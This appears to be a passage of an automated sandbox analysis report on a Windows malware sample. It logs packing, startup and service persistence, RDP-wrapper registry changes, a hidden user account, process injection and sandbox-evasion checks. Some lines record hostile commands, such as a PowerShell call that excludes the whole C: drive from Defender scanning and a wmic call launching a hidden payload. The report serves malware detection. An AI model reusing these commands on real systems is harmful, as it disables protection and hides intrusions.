          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdb source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdbUGP source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00408010 push ecx; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0041C352 pushad ; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0041D355 push esi; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0041C33A push esp; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D11190 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
          Source: initial sample | Static PE information: section name: UPX0
          Source: initial sample | Static PE information: section name: UPX1
          Source: initial sample | Static PE information: section name: UPX0
          Source: initial sample | Static PE information: section name: UPX1
          Source: initial sample | Static PE information: section name: UPX0
          Source: initial sample | Static PE information: section name: UPX1

          Persistence and Installation Behavior

          Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1D418 NetUserAdd,NetLocalGroupAddMembers,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\ProgramData\images.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\ProgramData:ApplicationData
          Source: C:\ProgramData\images.exe | File created: C:\Program Files\Microsoft DN1\sqlmap.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,

          Boot Survival

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start
          Source: C:\ProgramData\images.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
          Source: C:\Windows\System32\drivers\tsusbhub.sys | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

          Hooking and other Techniques for Hiding and Protection

          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: C:\ProgramData\images.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList GEAzbtF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe TID: 6364 Thread sleep count: 59 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\ProgramData\images.exe TID: 6520 Thread sleep count: 94 > 30
          Source: C:\ProgramData\images.exe TID: 6520 Thread sleep time: -75200s >= -30000s
          Source: C:\ProgramData\images.exe TID: 6704 Thread sleep count: 59 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112 Thread sleep count: 853 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112 Thread sleep time: -10236000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4887
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1233
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4936
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 702
          Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 853
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\ProgramData\images.exe Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe File opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe File opened: PHYSICALDRIVE0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe API call chain: ExitProcess graph end node
          Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
          Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
          Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
          Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: .?AVCRegistryVirtualMachine@ATL@@
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: A.?AVCRegistryVirtualMachine@ATL@@l
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_0040AAE3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_0040FD34 FindFirstFileExA,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_0040FE55 FindFirstFileExA,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
          Source: C:\Windows\System32\drivers\tsusbhub.sys System information queried: ModuleInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_0040FB09 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_0040C40E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_02D2094E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe Code function: 0_2_02D20619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0326001A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407269 IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00410931 GetProcessHeap,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\ProgramData\images.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407F52 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004079AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407DBF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040A7A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3260000 protect: page execute and read and write
          Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3280000 protect: page read and write
          Source: C:\ProgramData\images.exe | Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 326010E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3260000
          Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3280000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D179E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D21FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D218BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: GetProgmanWindow
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: SetProgmanWindow
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
